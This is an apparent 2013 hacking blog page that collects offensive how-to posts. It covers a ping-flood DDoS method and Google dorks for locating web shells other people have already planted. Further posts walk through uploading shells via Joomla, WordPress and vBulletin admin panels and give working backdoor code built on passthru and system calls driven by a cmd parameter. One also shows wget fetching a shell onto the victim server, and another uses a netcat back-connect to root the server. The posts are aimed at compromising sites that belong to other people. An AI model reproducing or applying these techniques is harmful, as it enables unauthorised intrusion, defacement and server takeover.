Skip to main content

Posts

Showing posts from May 28, 2013
                     >>> DDOS- ATTACKS<<<<      1)Ddos      2)What does It mean ?: Distributive Denial of Services Attack.     3)Basically DDOS Attacks are used to bring Down  Particular Site/s     4)How Do they Work:Shutting down a network path or flooding a server by sending large amount of Ping                                                        .       request  packets due to which the  transmission of data between a server and user gets disconnected ,  .       and            website goes on a offline stage.    5)How DDOS Uing Command Prompt:    Do just Follow These Steps;    Find Out A small or Medium sized Site mainly based on Apache server; then For windows uses press win  .  key     and R you will see run command box now type cmd [NOTE:There is a vast difference between . .    .  Cmd And           command prompt] now type    ping www.targetsite.com now there you will find ip adress of the target site copy that ip adress let it for    ex : 100.0

Google Dorks:Already Uploaded Shells . .C99 Shells

Following are is a google dorks   which can be used to find already   uploaded shells via Google. Dork List :  Get Shells For You too Download Here . And The Password Is Jaihind safe-mode: off (not secure) drwxrwxrwx c99shell inurl:c99.php inurl:c99.php uid=0(root) root c99.php "Captain Crunch Security Team" inurl:c99 inurl:c99.php allinurl: c99.php inurl:c99.php inurl:"c99.php" c99shell inurl:c99.php uid=0(root) c99shell powered by admin c99shell powered by admin inurl:"/c99.php" inurl:c99.php c99 shell v.1.0 (roots) inurl:c99.php allintitle: "c99shell" inurl:"c99.php allinurl: "c99.php" inurl:c99.php intitle:C99Shell v. 1.0 pre-release +uname allinurl: "c99.php" inurl:c99.php inurl:"c99.php" c99shell inurl:"/c99.php inurl:/c99.php+uname allinurl:"c99.php" inurl:"c99.php" allinurl:c99.php "inurl:c99..php" c99shell [file on secure

Uploading your shell into Joomla Panel . .

In this tutorial I will be telling you how to upload your shell after getting access into the Joomla Panel. Just follow the screenshots to succesfully upload your shell. 1.  First off all Login into your Joomla Panel by entering the login details. 2.  When You Will be logged in, you will see a page like this. 3.  See on the top and look for the option named Extension. Click on it and Select Template Manager 4.  After Clicking on Template Manager, Your Joomla panel will show up the following as shown in the picture below. 5.  From there choose any template and click on it, In my case I choose berk. Afer clicked on berk the following screen will came. 6.  See the top right of the Panel, you will see a option named Edit HTML. Click on that. 7.  Here you will see the source codes of the template. Now replace these codes with your shell's source code and click on save. Now you can access you shell. The path of your shell will be www.site.com/templates/beez/index.php

How To Upload Shell on Wordpress .

You an gain access yo admin panel of wordpress website via symlink. In this tutorial I will be telling you how to upload your shell after gaining the admin access. 1.  Login into the wordpress admin panel.  Goto    http://www.site.com/wp-admin/  or     http://www.site.com/wp-login/ 2.  Now on the left hand side look for the option Appreance. 3.  Click on Appreance after that you will get a option "Editior" click on that after clicking on Appreance. 4. After clicking on "Editior" under Appearance you will get the following screen with the source code of the theme.  Now see Right slider   bar and click on any option like 404.php or comments.php 5.  Replace the source codes with the codes of your shell and click on upload You wil get your shell uploaded here http://www.site.com/wp-content/themes/themename/yourshell.php

Bypass while FTP login during wordpress shell uploads .

In this post I will be telling you how to bypass FTP login during wordpress shell upload. Sometimes when we are shelling a Wordpress website by uploading a theme in a zip file, it asks for ftp login information. This can be easily Bypassed using the below Method .  First of all, Log In to your target wordpress website, then in the left side, look for  Plugin option, click on it and select  Add New . There you will see a page titled  Install Plugins,  below it look for the option  Upload  and click on it After clicking on the Upload option, you will get a new page asking you to upload the plugin, browse your.php shell for there and click on Upload After the upload process is completed, you'll get the following Just skip this forum, and you are done xD ! Suppose the name of your shell was code.php, so inorder to access it goto http://www.website.com/wp-content/uploads/code.php

Hiding Your Shell . .Via .htaccess

Today I will be telling you all a less know trick in which your can use  .htaccess  file on your already backdoored server as a shell to execute OS commands, so just follow the simple steps described below. Open your PHP web shell, navigate to  public_html  directory and search for  .htaccess   file, once found, click on edit option. After clicking on the  edit  option, add the following lines of code in yout  .htaccess  file. <Files ~ "^\.ht"> Order allow,deny Allow from all </Files> AddType application/x-httpd-php .htaccess # <?php passthru($_GET['cmd']); ?> After adding your codes, save it, and you are done ! :D Now in order to use your  .htaccess  shell http://www.your-hacked-website.com/.htaccess?cmd=ls After  ?cmd=  you can execute any OS command of your choice.

Make Free Calls Anywhere In the World

Hello guys today i will not be sharing any hack but a way to make free calls anywhere in world by using  vox.io  . Just we have to signup with a free account & then then validate your phone number . After that you can earn balance by  Invite your friends to  vox.io . It’s free to call other Vox.io users but if you want to make any international calls then charges apply. Steps  - Signup  - verify email - verify phone number - invite your friends & earn credits - Enjoy free call ! Feautres     Simple and easy to use.     Call friends through browser.     Upload contacts from your PC.     Free calls with other Vox.io users.     Buy credit and make cheap calls.     Free calls to other Vox.io users.    Invite friends & earn credits. Click here to go to visit the website  -  Vox.io

Server Rooting . . . .

Hi guys today i will tell you how to root a server in few easy steps . Things Required : NetcaT Shelled site Local root expl0it  Step By Step Tutorial : First go to Run & type cmd then type :  cd C:\Program Files\Netcat   ( Make sure that you Netcat is saved in the following directory ) . Now Type :  nc -n -l -v -p 443  , then it would show like the image shown below . Its time to open your shell & then connect  using back connect function in your shell ( Make sure that you are not using any Vpn or Proxy ) . Then after the connection is established you will see something as shown in the screenshot below . So you have successfully connected ..  Then now we have to get our Local Root Exploit, like mine is  2.6.18-374 2011 .  In this step we have to upload our exploit in a writable folder, so instead of wasting our time in finding them ..we can just change the directory to the /tmp folder which is a standard writable folder . 

DEfacing Vbulletin Sites . .

.Vbulletin 1-Log in admin cp 2-Under “Plugins & Products”, select Add New Plugin 3-Adjust the settings as follows: Product: vBulletin Hook Location: global_start Title: (Anything …) Execution Order: 5 Code: ob_start(); system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean(); Plugin is Active : Yes So in the end it should look (see Pic ) 4-After the plugin is added, go to the heading “Style and Design”, select “Style Manager 5-Under whatever the default style is in the dropdown menu, select Edit Templates. 6-Scroll ForumHome models and expand. Click [Customize] beside FORUMHOME. 7-Search Code: $header Somewhere near the top. Replace it with: Code: $header $execcod e 8-Now go to the forum and add after the index.php Code: ?cmd=wget  http://www.site.com/ shell.txt;mv shell.txt shell.php So it looks like Code: http://www.site.com/ pathtoforum/index.php?cmd=wget   http://www.site.com/ shell.txt;mv  shell.txt shell.php What this does is shell.txt downloads, and rena

DROIDSQLI : FIRST AUTOMATED MYSQL INJECTION TOOL FOR ANDROID

DroidSQLi is the first automated MySQL Injection tool for Android. It allows you to test your MySQL-based web application against SQL injection attacks. DroidSQLi supports the following injection techniques: -  Time based injection -  Blind injection -  Error based injection -  Normal injection It automatically selects the best technique to use and employs some simple filter evasion methods. **Legal notice**: This application is for educational purposes ONLY. No warranties of any kind are expressed or implied. ###Use at your own risk! DOWNLOAD:  http://adf.ly/PGVvw

Basic Linux Commands

                                                            File Operations pwd              Print Name Of Current/Working Directory cd                 Changing The Working Directory cp                 Copy Files Or Directory rm                 Remove Files And Directory ls                   List Of Directory Contents mkdir             Make Directory cat                 Concatenate Files And Print On Standard Output mv                 Move Files chmod           Change Files Permissions                                        Know Your System                                                     uname            Print System Information who               Show Who Is Logged On cal                 Displays Calculator date               Print System Date And Time df                   Report File System Disk Space Usage du                  Estimate File Space Usage ps                  Displays Information Of Current Active Processes kill                 Allows